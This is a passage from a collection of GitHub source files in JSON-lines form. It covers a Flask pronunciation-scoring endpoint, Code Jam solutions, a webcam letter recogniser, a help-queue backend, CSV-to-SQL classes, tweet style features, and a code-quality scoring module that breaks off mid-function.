normalisation\n means = tf.math.reduce_mean(spectrogram, 1, keepdims=True)\n stddevs = tf.math.reduce_std(spectrogram, 1, keepdims=True)\n spectrogram = (spectrogram - means) / (stddevs + 1e-10)\n ###########################################\n ## Process the label\n ##########################################\n # 7. Convert label to Lower case\n label = tf.strings.lower(label)\n # 8. Split the label\n label = tf.strings.unicode_split(label, input_encoding=\"UTF-8\")\n # 9. Map the characters in label to numbers\n label = char_to_num(label)\n # 10. Return a dict as our model is expecting two inputs\n return spectrogram, label\n\ndef decode_batch_predictions(pred):\n input_len = np.ones(pred.shape[0]) * pred.shape[1]\n # Use greedy search. For complex tasks, you can use beam search\n results = keras.backend.ctc_decode(pred, input_length=input_len, greedy=True)[0][0]\n # Iterate over the results and get back the text\n output_text = []\n for result in results:\n result = tf.strings.reduce_join(num_to_char(result)).numpy().decode(\"utf-8\")\n output_text.append(result)\n return output_text\n\n# Recreate the exact same model, including its weights and the optimizer\nmodel = tf.keras.models.load_model('finalModel.h5',custom_objects={'CTCLoss':CTCLoss},compile=False)\n# Optimizer\nopt = keras.optimizers.Adam(learning_rate=1e-4)\n# Compile the model and return\nmodel.compile(optimizer=opt, loss=CTCLoss)\n\n# define a predict function as an endpoint \n@app.route(\"/predict\", methods=[\"GET\",\"POST\"])\ndef predict():\n \n data = {\"success\": False}\n if flask.request.method == 'POST':\n params = flask.request.json\n if (params == None):\n params = flask.request.args\n\n # if parameters are found, return a prediction\n if (params != None):\n if 'file' not in flask.request.files:\n flask.flash('No file part')\n return flask.redirect(flask.request.url)\n \n word =flask.request.form.get(\"word\")\n word = word.lower()\n correct_pronun=word_dict[word_dict['word']==word].iloc[:,[1]].to_numpy()[0][0].lower()\n \n file = flask.request.files['file']\n print(file.content_type)\n final_name =file.filename.split(\".\")[0] + \".wav\"\n flac_tmp_audio_data = AudioSegment.from_file(file, format=\"m4a\")\n flac_tmp_audio_data.export(final_name, format=\"wav\", parameters=['-acodec', 'pcm_s16le', '-ac', '1', '-ar', '44100'])\n test_data = encode_testdata(final_name,'take')\n X,y = test_data\n matrix = X[np.newaxis,...]\n batch_predictions = model.predict(matrix)\n batch_predictions = decode_batch_predictions(batch_predictions)\n print(batch_predictions)\n print([correct_pronun])\n wer_score = wer([correct_pronun],batch_predictions )\n data[\"target\"] = str(correct_pronun)\n data[\"prediction\"] = str(batch_predictions[0])\n data[\"score\"] = str(1-wer_score)\n #os.remove(final_name)\n data[\"success\"] = True\n\n # return a response in json format \n return flask.jsonify(data) \n\n# start the flask app, allow remote connections \napp.run(host='0.0.0.0')","repo_name":"minhtien2152/e-kids-be","sub_path":"flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23564993451","text":"fin = open('B-large.in','r')\nfout = open('output.txt','w')\nt = int(fin.readline())\nfor count in range(1, t + 1):\n line = fin.readline().strip()\n n = list(line)\n n = list(map(int, n));\n for i in range(1, len(n)):\n if n[i] < n[i - 1]:\n j = i - 1;\n while (j > 0) and (n[j] == n[j - 1]):\n j = j - 1;\n 
n[j] = n[j] - 1;\n for k in range(j + 1, len(n)):\n n[k] = 9;\n break;\n fout.write('Case #' + str(count) + ': ')\n if n[0] != 0:\n fout.write(str(n[0]))\n for i in range(1, len(n)):\n fout.write(str(n[i]))\n fout.write('\\n')\nfin.close()\nfout.close()\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/652.py","file_name":"652.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23585698381","text":"from math import pi\ntt = int(input())\nfor case in range(1,tt+1):\n n,k = list(map(int, input().split()))\n ck = []\n for i in range(n):\n r, h = list(map(float, input().split()))\n ck.append((2*pi*r*h, pi * r**2))\n ck = sorted(ck, key=lambda w: -w[1])\n use = [0.0]*(k+1)\n for it in ck:\n for b in range(k-1,-1,-1):\n if b == 0:\n use[1] = max(use[1], sum(it))\n else:\n use[b+1] = max(use[b+1], use[b]+it[0])\n print(\"Case #%d: %f\"%(case, use[k]))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_209/278.py","file_name":"278.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5060884201","text":"import cv2\r\nimport torch\r\nfrom torchvision.transforms import transforms\r\nimport torchvision\r\nimport numpy\r\nfrom PIL import Image\r\n\r\n\r\ndef camuh():\r\n vid_cod = cv2.VideoWriter_fourcc(*'XVID')\r\n output = cv2.VideoWriter(\"cam_video.mp4\", vid_cod, 20.0, (640,480))\r\n videoCaptureObject = cv2.VideoCapture(0)\r\n pred_labels = []\r\n while(True):\r\n ret,frame = videoCaptureObject.read()\r\n\r\n cv2.imwrite('image.png',frame)\r\n cv2.imshow('recognising,press q to quit',frame)\r\n path=\"modeluh.pt\"\r\n device=torch.device('cpu')\r\n model = torchvision.models.vgg19_bn(pretrained=True)\r\n model=(torch.load(path, map_location=device))\r\n model.eval()\r\n transform = transforms.Compose([transforms.Resize(224),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor()])\r\n \r\n \r\n image =transform(Image.open('image.png'))\r\n #print(image)\r\n image = image.unsqueeze(0)\r\n outputs = model(image)\r\n _, predicted = torch.max(outputs.data,1 )\r\n a=(predicted.item())\r\n #print(a)\r\n #print(_)\r\n dictuh ={\r\n 0:'a',\r\n 1:'b',\r\n 2:'c',\r\n 3:'d',\r\n 4:'e',\r\n 5:'f',\r\n 6:'g',\r\n 7:'h',\r\n 8:'i',\r\n 9:'j',\r\n 10:'k',\r\n 11:'l',\r\n 12:'m',\r\n 13:'n',\r\n 14:'o',\r\n 15:'p',\r\n 16:'q',\r\n 17:'r',\r\n 18:'s',\r\n 19:'t',\r\n 20:'u',\r\n 21:'v',\r\n 22:'w',\r\n 23:'x',\r\n 24:'y',\r\n 25:'z',\r\n }\r\n\r\n vandru=dictuh[a]\r\n pred_labels.append(vandru)\r\n #print(pred_labels)\r\n output.write(frame)\r\n if(cv2.waitKey(1) & 0xFF == ord('q')):\r\n break\r\n output.release()\r\n videoCaptureObject.release()\r\n cv2.destroyAllWindows()\r\n return pred_labels\r\n\r\n'''\r\n\r\n\r\nimport cv2\r\n#Capture video from webcam\r\nvid_capture = cv2.VideoCapture(0)\r\nvid_cod = cv2.VideoWriter_fourcc(*'XVID')\r\noutput = cv2.VideoWriter(\"videos/cam_video.mp4\", vid_cod, 20.0, (640,480))\r\nwhile(True):\r\n # Capture each frame of webcam video\r\n ret,frame = vid_capture.read()\r\n cv2.imshow(\"My cam video\", frame)\r\n output.write(frame)\r\n # Close and break the loop after pressing \"x\" key\r\n if cv2.waitKey(1) &0XFF == ord('x'):\r\n break\r\n# close the already opened camera\r\nvid_capture.release()\r\n# close the already opened file\r\noutput.release()\r\n# close the window and de-allocate any 
associated memory usage\r\ncv2.destroyAllWindows()\r\n\r\n'''\r\n","repo_name":"srisharaan/chatease","sub_path":"cam.py","file_name":"cam.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19743130094","text":"'''\nbackend (core functions)\n'''\nWAITING_LIST = []\n\ndef make_request(student_id, issue):\n '''\n Used by students to make a request. The request is put in the queue with a\n \"waiting\" status.\n Parameters:\n student_id (str): The student_id of the student making the request.\n\n issue (str): A brief description of what the student needs help\n with.\n '''\n global WAITING_LIST\n\n if issue is None:\n raise ValueError\n if issue == \"\":\n raise ValueError\n # corresponding student_id is already inside the queue.\n for student in WAITING_LIST:\n if student['student_id'] == student_id:\n raise KeyError\n\n WAITING_LIST.append({'student_id': student_id, 'issue': issue, 'status': 'waiting'})\n\n\ndef queue():\n '''\n Used by tutors to view all the students in the queue in order.\n\n Returns:\n (list of dict) : A list of dictionaries where each dictionary has the keys\n { 'student_id', 'issue', 'status' }. These correspond to the student's student_id,\n the issue of their problem, and the status of their request (either\n \"waiting\" or \"receiving\").\n '''\n global WAITING_LIST\n return WAITING_LIST\n\ndef remaining(student_id):\n '''\n Used by students to see how many requests there are ahead of theirs in the\n queue that also have a \"waiting\" status.\n\n Params:\n student_id (str): The student_id of the student with the request.\n\n Raises:\n KeyError: if the student does not have a request in the queue with a\n \"waiting\" status.\n\n Returns:\n (int) : The position as a number >= 0\n '''\n for student in queue():\n if student['student_id'] == student_id and student['status'] == 'receiving':\n raise KeyError\n for student in queue():\n if student['student_id'] == student_id:\n get_turn = queue().index(student)\n if queue()[0]['status'] == 'receiving':\n return get_turn - 1\n return get_turn\n\ndef help(student_id):\n '''\n Used by tutors to indicate that a student is getting help with their\n request. 
It sets the status of the request to \"receiving\".\n\n Params:\n student_id (str): The student_id of the student with the request.\n\n Raises:\n KeyError: if the given student does not have a request with a \"waiting\"\n status.\n '''\n for student in queue():\n if student['student_id'] == student_id:\n if student['status'] != 'waiting':\n raise KeyError\n student['status'] = 'receiving'\n\ndef resolve(student_id):\n '''\n Used by tutors to remove a request from the queue when it has been resolved.\n\n Params:\n student_id (str): The student_id of the student with the request.\n\n Raises:\n KeyError: if the given student does not have a request in the queue with a\n \"receiving\" status.\n '''\n for student in queue():\n if student['student_id'] == student_id:\n if student['student_id'] == student_id and student['status'] != 'receiving':\n raise KeyError\n queue().remove(student)\n # update student_id_TIME_PAIR dictionary because they've got help\n\ndef cancel(student_id):\n '''\n Used by students to remove their request from the queue in the event they\n solved the problem themselves before a tutor was a available to help them.\n\n Unlike resolve(), any requests that are cancelled are NOT counted towards\n the total number of requests the student has made in the session.\n\n Params:\n student_id (str): The student_id of the student who made the request.\n\n Raises:\n KeyError: If the student does not have a request in the queue with a\n \"waiting\" status.\n '''\n for student in queue():\n if student['student_id'] == student_id:\n if student['status'] != 'waiting':\n raise KeyError\n queue().remove(student)\n\ndef revert(student_id):\n '''\n Used by tutors in the event they cannot continuing helping the student. This\n function sets the status of student's request back to \"waiting\" so that\n another tutor can help them.\n\n Params:\n student_id (str): The student_id of the student with the request.\n\n Raises:\n KeyError: If the student does not have a request in the queue with a\n \"receiving\" status.\n '''\n for student in queue():\n if student['student_id'] == student_id:\n if student['status'] != 'receiving':\n raise KeyError\n student['status'] = 'waiting'\n\ndef reset_queue():\n '''\n Reset\n Used by tutors at the end of the help session. 
All requests are removed from\n the queue and any records of previously resolved requests are wiped.\n '''\n global WAITING_LIST\n WAITING_LIST = []\n","repo_name":"haeSunshim/Issue-Tracker_Sandeep-Haesun","sub_path":"backend_queuing_app/queuing_app.py","file_name":"queuing_app.py","file_ext":"py","file_size_in_byte":4801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13528544274","text":"import pandas as pd\nfrom sqlalchemy import create_engine\n\n''' \nSQL classes for creating and getting connections inserting the data into database is done in these classes.\nThis class also calculates largest deviation.\n'''\n\n\nclass SQLClass:\n # Read csv\n def __init__(self, csv_path):\n self.dataFrames = []\n try:\n self.csv_data = pd.read_csv(csv_path)\n except FileNotFoundError:\n print(\"Issue while reading file {}\".format(csv_path))\n raise\n\n def toSql(self, file_name, title):\n\n db_engine = create_engine('sqlite:///{}.db'.format(file_name), echo=False)\n\n # Using dbEngine and saving data\n csv_data = self.csv_data.copy()\n csv_data.columns = [name.capitalize() + title for name in csv_data.columns]\n csv_data.set_index(csv_data.columns[0], inplace=True)\n\n csv_data.to_sql(title, db_engine, if_exists=\"replace\", index=True, )\n\n\nclass ParentFunction:\n\n def __init__(self, ideal, name):\n self._name = name\n self.ideal = ideal\n\n\nclass IdealFunction(ParentFunction):\n def __init__(self, ideal, train, name):\n self.train_function = train\n super().__init__(ideal, name)\n\n # Calculate the largest deviation between train and ideal\n def calculate_largest_deviation(self):\n deviation = self.train_function - self.ideal\n return max(deviation.abs())\n","repo_name":"AravindhRamasamy/Python-Programming","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20598195078","text":"from __future__ import division\r\n\r\n\r\ndef capitalized_words_in_tweet(tweet):\r\n count = 0\r\n if len(tweet) != 0:\r\n for w in tweet.split():\r\n if w.isupper():\r\n if len(w) > 1:\r\n count = count + 1\r\n return count\r\n\r\n\r\ndef exclamation_count(tweet):\r\n tweet_words = tweet.split()\r\n count = 0\r\n for word in tweet_words:\r\n if word.count(\"!\") > 2:\r\n count += 1\r\n return count\r\n\r\n\r\ndef question_mark_count(tweet):\r\n tweet_words = tweet.split()\r\n count = 0\r\n for word in tweet_words:\r\n if word.count(\"?\") > 2:\r\n count += 1\r\n return count\r\n\r\n\r\ndef capital_count_in_a_word(tweet):\r\n count = 0\r\n if len(tweet) != 0:\r\n for c in tweet:\r\n if str(c).isupper():\r\n count = count + 1\r\n return count\r\n\r\n\r\ndef surround_by_signs(tweet):\r\n highlight = ['\"', \"'\", \"*\"]\r\n count = 0\r\n if len(tweet) != 0:\r\n for c in tweet:\r\n if c[0] == c[len(c) - 1] and c[0] in highlight:\r\n count = count + 1;\r\n return count\r\n\r\n\r\ndef writing_style_vector(tweet):\r\n cap_word = capitalized_words_in_tweet(tweet)\r\n exc_count = exclamation_count(tweet)\r\n que_count = question_mark_count(tweet)\r\n cap_count = capital_count_in_a_word(tweet)\r\n surr_count = surround_by_signs(tweet)\r\n return [cap_word, exc_count, que_count, cap_count, 
surr_count]\r\n","repo_name":"Subangani/TSAwithSSL","sub_path":"src/_writing_style_.py","file_name":"_writing_style_.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"4272332282","text":"####################################################################################################\r\n# Quality model (scoring rules)\r\n# The following quality characteristics are evaluated:\r\n# - Violations.- the number of violations is multiplied by a factor that depends on their severity (blocker, critical, major, minor, info)\r\n# Notes:\r\n# + The score is truncated to 2/5 of the maximum possible if there is any Blocker or Critical violation\r\n# - Coverage.- unit test coverage. The higher the better\r\n# - Comment density.- the higher the better\r\n# - Complexity.- the lower the better\r\n# - Duplications.- the lower the better\r\n# Each characteristic is given a weight in the properties file (weight), and the sum of the weights must equal the maximum score MAX_RATE = 5\r\n \r\n#\r\n####################################################################################################\r\nimport sys\r\nimport json\r\nimport datetime\r\n\r\nMAX_SCORE = 5.0\r\nMIN_SCORE = 0.0\r\n\r\n\r\nclass QualityRateEvaluator:\r\n \r\n def evaluate(qualityCodeResults, myQualityModel):\r\n try:\r\n print (\"Evaluating Quality Code Metrics ...\")\r\n totalRate = QualityRateEvaluator.calculateViolationsRate(qualityCodeResults, myQualityModel)\r\n totalRate += QualityRateEvaluator.calculateDuplicationsRate(qualityCodeResults, myQualityModel)\r\n totalRate += QualityRateEvaluator.calculateCommentsRate(qualityCodeResults, myQualityModel)\r\n totalRate += QualityRateEvaluator.calculateCoverageRate(qualityCodeResults, myQualityModel)\r\n totalRate += QualityRateEvaluator.calculateComplexityRate(qualityCodeResults, myQualityModel)\r\n \r\n qualityCodeResults.score = totalRate\r\n except Exception as e:\r\n print (\"Error in QualityRateEvaluator.evaluate: \", e)\r\n raise ValueError \r\n except: # catch *all* exceptions\r\n print (\"QualityRateEvaluator.evaluate: \", e)\r\n e = sys.exc_info()[0]\r\n print (\"EXCEPTION:\", e)\r\n\r\n\r\n\r\n def calculateViolationsRate(qualityCodeResults, myQualityModel):\r\n try:\r\n aggregatedMetricsWeight = myQualityModel.violations_weight + myQualityModel.coverage_weight + myQualityModel.duplication_weight + myQualityModel.complexity_weight + myQualityModel.comments_weight \r\n violationsScore = MIN_SCORE\r\n print (\" Evaluating Violations...\")\r\n print (\" Evaluating Blocker Violations Metric. Num violations:\", qualityCodeResults.blocker_violations, \". Severity Factor: \", myQualityModel.severity_factors[4])\r\n blockerViolationsFactor = qualityCodeResults.blocker_violations * myQualityModel.severity_factors[4]\r\n print (\" Blocker Violations Metric:\", blockerViolationsFactor)\r\n\r\n print (\" Evaluating Critical Violations Metric. Num violations:\", qualityCodeResults.critical_violations, \". Severity Factor: \", myQualityModel.severity_factors[3])\r\n criticalViolationsFactor = qualityCodeResults.critical_violations * myQualityModel.severity_factors[3]\r\n print (\" Critical Violations Metric:\", criticalViolationsFactor)\r\n\r\n print (\" Evaluating Major Violations Metric. Num violations:\", qualityCodeResults.major_violations, \". 
Severity Factor: \", myQualityModel.severity_factors[2])\r\n majorViolationsFactor = qualityCodeResults.major_violations * myQualityModel.severity_factors[2]\r\n print (\" Major Violations Metric:\", majorViolationsFactor)\r\n\r\n print (\" Evaluating Minor Violations Metric. Num violations:\", qualityCodeResults.minor_violations, \". Severity Factor: \", myQualityModel.severity_factors[1])\r\n minorViolationsFactor = qualityCodeResults.minor_violations * myQualityModel.severity_factors[1]\r\n print (\" Minor Violations Metric:\", minorViolationsFactor)\r\n\r\n print (\" Evaluating Info Violations Metric. Num violations:\", qualityCodeResults.info_violations, \". Severity Factor: \", myQualityModel.severity_factors[0])\r\n infoViolationsFactor = qualityCodeResults.info_violations * myQualityModel.severity_factors[0]\r\n print (\" Info Violations Metric:\", infoViolationsFactor)\r\n\r\n totalViolationsFactor = blockerViolationsFactor + criticalViolationsFactor + majorViolationsFactor + minorViolationsFactor + infoViolationsFactor\r\n print (\" Total Violations Metric:\", totalViolationsFactor)\r\n \r\n print (\" NCLOC:\", qualityCodeResults.ncloc, \". Violations Metric:\", totalViolationsFactor)\r\n violationsRate = qualityCodeResults.ncloc / totalViolationsFactor\r\n print (\" Violations Rate [NCLOC / totalViolationsMetric] (higher is better):\", violationsRate)\r\n \r\n if violationsRate > myQualityModel.max_violations_rate:\r\n violationsScore = MAX_SCORE\r\n print (\" Violations Rate is higher than MAX value (very good!). Set violationsScore to:\", violationsScore)\r\n elif violationsRate < myQualityModel.min_violations_rate:\r\n violationsScore = MIN_SCORE\r\n print (\" Violations Rate is lower than MIN value (very bad!). Set violationsScore to:\", violationsScore)\r\n else:\r\n # Calculate 3 rule\r\n violationsScore = (MAX_SCORE * (violationsRate - myQualityModel.min_violations_rate)) / (myQualityModel.max_violations_rate - myQualityModel.min_violations_rate) \r\n print ( \" Violations [ \", MIN_SCORE, \" - \", MAX_SCORE, \" ] Score:\", violationsScore)\r\n \r\n # If there are blocker or critical violations, absolute score is truncated to 2 point over 5\r\n truncatedScore = 2 * (MAX_SCORE / 5) \r\n if ((violationsScore > truncatedScore) and (qualityCodeResults.blocker_violations + qualityCodeResults.critical_violations > 0)):\r\n violationsScore = truncatedScore\r\n print (\" Violations Score truncated due to blocker / critical violations:\", violationsScore)\r\n\r\n\r\n violationsWeightedScore = (violationsScore * myQualityModel.violations_weight) / aggregatedMetricsWeight\r\n \r\n # If Score is higher than MAX, apply a BONUS\r\n if violationsScore >= MAX_SCORE:\r\n violationsWeightedScore += myQualityModel.violations_bonus;\r\n print (\" Reached Max Violations Metric Score --> BONUS [+\", myQualityModel.violations_bonus, \"] applied.\") \r\n # If Score is lower than MAX, apply a PENALTY\r\n if violationsScore <= MIN_SCORE:\r\n violationsWeightedScore -= myQualityModel.violations_penalty;\r\n print (\" Violations score is too low --> PENALTY [-\", myQualityModel.violations_penalty, \"] applied.\") \r\n\r\n print (\" Violations Metric Weight is \", myQualityModel.violations_weight , \" and violations Score is \", violationsScore)\r\n print (\" Final Violations Rated score (Weighted) is: \", violationsWeightedScore)\r\n print (\" \")\r\n return violationsWeightedScore \r\n except Exception as e:\r\n print (\"Error in QualityRateEvaluator.calculateViolationsRate: \", e)\r\n raise 
ValueError \r\n except: # catch *all* exceptions\r\n print (\"QualityRateEvaluator.calculateViolationsRate: \", e)\r\n e = sys.exc_info()[0]\r\n print (\"EXCEPTION:\", e)\r\n\r\n def calculateCommentsRate(qualityCodeResults, myQualityModel):\r\n try:\r\n aggregatedMetricsWeight = myQualityModel.violations_weight + myQualityModel.coverage_weight + myQualityModel.duplication_weight + myQualityModel.complexity_weight + myQualityModel.comments_weight \r\n score = MIN_SCORE\r\n weightedScore = MIN_SCORE\r\n print (\" Evaluating Comments density rate...\")\r\n print (\" Comments density percent (SonarMetric): \", qualityCodeResults.comment_lines_density)\r\n \r\n if qualityCodeResults.comment_lines_density < myQualityModel.comments_levels[0]:\r\n score = MIN_SCORE\r\n print (\" Metric is lower than Score Level 1 (very bad!). Set Score to:\", MIN_SCORE)\r\n elif qualityCodeResults.comment_lines_density > myQualityModel.comments_levels[4]:\r\n score = MAX_SCORE\r\n print (\" Metric is higher than Score Level 5 (very good!). Set Score to:\", MAX_SCORE)\r\n else:\r\n level = 1\r\n while ((level < 5) & (qualityCodeResults.comment_lines_density > myQualityModel.comments_levels[level])):\r\n level += 1\r\n # Reached Score is 1 point for each level reached plus a percentage of the current level (3-rule)\r\n partialScore = (qualityCodeResults.comment_lines_density - myQualityModel.comments_levels[level-1]) / (myQualityModel.comments_levels[level] - myQualityModel.comments_levels[level-1])\r\n score = level - 1 + partialScore \r\n print (\" Value is between Score Level \", level-1, \" (\", myQualityModel.comments_levels[level-1], \") and \", level, \" (\", myQualityModel.comments_levels[level], \"). Set Score to:\", score)\r\n \r\n weightedScore = (score * myQualityModel.comments_weight) / aggregatedMetricsWeight\r\n \r\n # If Score is higher than MAX, apply a BONUS\r\n if qualityCodeResults.comment_lines_density > myQualityModel.comments_max_value:\r\n weightedScore += myQualityModel.comments_bonus;\r\n print (\" Score is higher than MAX --> BONUS [+\", myQualityModel.comments_bonus, \"] applied.\") \r\n # If Score is lower than MIN, apply a PENALTY\r\n if qualityCodeResults.comment_lines_density < myQualityModel.comments_min_value:\r\n weightedScore -= myQualityModel.comments_penalty;\r\n print (\" Score is too low --> PENALTY [-\", myQualityModel.comments_penalty, \"] applied.\") \r\n\r\n print (\" Comments Density Metric Weight is \", myQualityModel.comments_weight , \" and Score is \", score)\r\n print (\" Final Comments Density Rated score (Weighted) is: \", weightedScore)\r\n print (\" \") \r\n return weightedScore\r\n \r\n except Exception as e:\r\n print (\"Error in QualityRateEvaluator.calculateCommentsRate: \", e)\r\n raise ValueError \r\n except: # catch *all* exceptions\r\n print (\"QualityRateEvaluator.calculateCommentsRate: \", e)\r\n e = sys.exc_info()[0]\r\n print (\"EXCEPTION:\", e)\r\n\r\n\r\n def calculateCoverageRate(qualityCodeResults, myQualityModel):\r\n try:\r\n aggregatedMetricsWeight = myQualityModel.violations_weight + myQualityModel.coverage_weight + myQualityModel.duplication_weight + myQualityModel.complexity_weight + myQualityModel.comments_weight \r\n score = MIN_SCORE\r\n weightedScore = MIN_SCORE\r\n print (\" Evaluating Test Coverage rate...\")\r\n print (\" Test Coverage percent (SonarMetric): \", qualityCodeResults.coverage)\r\n \r\n if qualityCodeResults.coverage < myQualityModel.coverage_levels[0]:\r\n score = MIN_SCORE\r\n print (\" Metric is lower than Score Level 1 (very bad!). Set Score to:\", MIN_SCORE)\r\n elif qualityCodeResults.coverage > myQualityModel.coverage_levels[4]:\r\n score = MAX_SCORE\r\n print (\" Metric is higher than Score Level 5 (very good!). Set Score to:\", MAX_SCORE)\r\n else:\r\n level = 1\r\n while ((level < 5) & (qualityCodeResults.coverage > myQualityModel.coverage_levels[level])):\r\n level += 1\r\n # Reached Score is 1 point for each level reached plus a percentage of the current level (3-rule)\r\n partialScore = (qualityCodeResults.coverage - myQualityModel.coverage_levels[level-1]) / (myQualityModel.coverage_levels[level] - myQualityModel.coverage_levels[level-1])\r\n score = level - 1 + partialScore \r\n print (\" Value is between Score Level \", level-1, \" (\", myQualityModel.coverage_levels[level-1], \") and \", level, \" (\", myQualityModel.coverage_levels[level], \"). Set Score to:\", score)\r\n \r\n weightedScore = (score * myQualityModel.coverage_weight) / aggregatedMetricsWeight\r\n \r\n # If Score is higher than MAX, apply a BONUS\r\n if qualityCodeResults.coverage > myQualityModel.coverage_max_value:\r\n weightedScore += myQualityModel.coverage_bonus;\r\n print (\" Score is higher than MAX --> BONUS [+\", myQualityModel.coverage_bonus, \"] applied.\") \r\n # If Score is lower than MIN, apply a PENALTY\r\n if qualityCodeResults.coverage < myQualityModel.coverage_min_value:\r\n weightedScore -= myQualityModel.coverage_penalty;\r\n print (\" Score is too low --> PENALTY [-\", myQualityModel.coverage_penalty, \"] applied.\") \r\n\r\n print (\" Test Coverage Metric Weight is \", myQualityModel.coverage_weight , \" and Score is \", score)\r\n print (\" Final Test Coverage Rated score (Weighted) is: \", weightedScore)\r\n print (\" \") \r\n return weightedScore\r\n \r\n except Exception as e:\r\n print (\"Error in QualityRateEvaluator.calculateCoverageRate: \", e)\r\n raise ValueError \r\n except: # catch *all* exceptions\r\n print (\"QualityRateEvaluator.calculateCoverageRate: \", e)\r\n e = sys.exc_info()[0]\r\n print (\"EXCEPTION:\", e)\r\n\r\n\r\n\r\n def calculateDuplicationsRate(qualityCodeResults, myQualityModel):\r\n try:\r\n aggregatedMetricsWeight = myQualityModel.violations_weight + myQualityModel.coverage_weight + myQualityModel.duplication_weight + myQualityModel.complexity_weight + myQualityModel.comments_weight \r\n duplicationScore = MIN_SCORE\r\n duplicationWeightedScore = MIN_SCORE\r\n print (\" Evaluating Duplicated Code rate...\")\r\n print (\" Duplications metric (SonarMetric): \", qualityCodeResults.duplicated_lines_density)\r\n \r\n # This is a NEGATIVE METRIC: HIGHER IS WORSE\r\n if qualityCodeResults.duplicated_lines_density > myQualityModel.duplication_levels[0]:\r\n score = MIN_SCORE\r\n print (\" Metric is higher than Score Level 1 (very bad!). Set Score to:\", MIN_SCORE)\r\n elif qualityCodeResults.duplicated_lines_density < myQualityModel.duplication_levels[4]:\r\n score = MAX_SCORE\r\n print (\" Metric is lower than Score Level 5 (very good!). Set Score to:\", MAX_SCORE)\r\n else:\r\n level = 1\r\n while ((level < 5) & (qualityCodeResults.duplicated_lines_density < myQualityModel.duplication_levels[level])):\r\n level += 1\r\n # Reached Score is 1 point for each level reached plus a percentage of the current level (3-rule)\r\n partialScore = (myQualityModel.duplication_levels[level-1] - qualityCodeResults.duplicated_lines_density) / (myQualityModel.duplication_levels[level-1] - myQualityModel.duplication_levels[level])\r\n score = level - 1 + partialScore \r\n print (\" Value is between Score Level \", level-1, \" (\", myQualityModel.duplication_levels[level-1], \") and \", level, \" (\", myQualityModel.duplication_levels[level], \"). Set Score to:\", score)\r\n \r\n weightedScore = (score * myQualityModel.duplication_weight) / aggregatedMetricsWeight\r\n \r\n # If Score is higher than MAX, apply a BONUS\r\n if qualityCodeResults.duplicated_lines_density < myQualityModel.duplication_min_value:\r\n weightedScore += myQualityModel.duplication_bonus;\r\n print (\" Score is higher than MAX --> BONUS [+\", myQualityModel.duplication_bonus, \"] applied.\") \r\n # If Score is lower than MIN, apply a PENALTY\r\n if qualityCodeResults.duplicated_lines_density > myQualityModel.duplication_max_value:\r\n weightedScore -= myQualityModel.duplication_penalty;\r\n print (\" Score is too low --> PENALTY [-\", myQualityModel.duplication_penalty, \"] applied.\") \r\n\r\n print (\" Duplicated Code Metric Weight is \", myQualityModel.duplication_weight , \" and Score is \", score)\r\n print (\" Final Duplicated Code Rated score (Weighted) is: \", weightedScore)\r\n print (\" \") \r\n return weightedScore\r\n \r\n except Exception as e:\r\n print (\"Error in QualityRateEvaluator.calculateDuplicationsRate: \", e)\r\n raise ValueError \r\n except: # catch *all* exceptions\r\n print (\"QualityRateEvaluator.calculateDuplicationsRate: \", e)\r\n e = sys.exc_info()[0]\r\n print (\"EXCEPTION:\", e)\r\n\r\n\r\n\r\n\r\n def calculateComplexityRate(qualityCodeResults, myQualityModel):\r\n try:\r\n aggregatedMetricsWeight = myQualityModel.violations_weight + myQualityModel.coverage_weight + myQualityModel.duplication_weight + myQualityModel.complexity_weight + myQualityModel.comments_weight \r\n complexityScore = MIN_SCORE\r\n complexityWeightedScore = MIN_SCORE\r\n print (\" Evaluating Complexity Code rate...\")\r\n print (\" Complexity in functions metric (SonarMetric): \", qualityCodeResults.complexity_in_functions)\r\n print (\" Number of functions (SonarMetric): \", qualityCodeResults.functions)\r\n averageComplexity = qualityCodeResults.complexity_in_functions / qualityCodeResults.functions\r\n print (\" Average complexity per function: \", averageComplexity)\r\n \r\n \r\n # This is a NEGATIVE METRIC: HIGHER IS WORSE\r\n if averageComplexity > myQualityModel.complexity_levels[0]:\r\n score = MIN_SCORE\r\n print (\" Metric is higher than Score Level 1 (very bad!). Set Score to:\", MIN_SCORE)\r\n elif averageComplexity < myQualityModel.complexity_levels[4]:\r\n score = MAX_SCORE\r\n print (\" Metric is lower than Score Level 5 (very good!). 
Set Score to:\", MAX_SCORE)\r\n            else:\r\n                level = 1\r\n                while (level < 5) and (averageComplexity < myQualityModel.complexity_levels[level]):\r\n                    level += 1\r\n                # Score is 1 point for each level reached plus a proportional share of the current level (rule of three)\r\n                partialScore = (myQualityModel.complexity_levels[level-1] - averageComplexity) / (myQualityModel.complexity_levels[level-1] - myQualityModel.complexity_levels[level])\r\n                score = level - 1 + partialScore\r\n                print (\"   Value is between Score Level \", level-1, \" (\", myQualityModel.complexity_levels[level-1], \") and \", level, \" (\", myQualityModel.complexity_levels[level], \"). Set Score to:\", score)\r\n\r\n            weightedScore = (score * myQualityModel.complexity_weight) / aggregatedMetricsWeight\r\n\r\n            # Negative metric: a value below the configured MIN is best --> apply a BONUS\r\n            if averageComplexity < myQualityModel.complexity_min_value:\r\n                weightedScore += myQualityModel.complexity_bonus\r\n                print (\"   Score is higher than MAX --> BONUS [+\", myQualityModel.complexity_bonus, \"] applied.\")\r\n            # Negative metric: a value above the configured MAX is worst --> apply a PENALTY\r\n            if averageComplexity 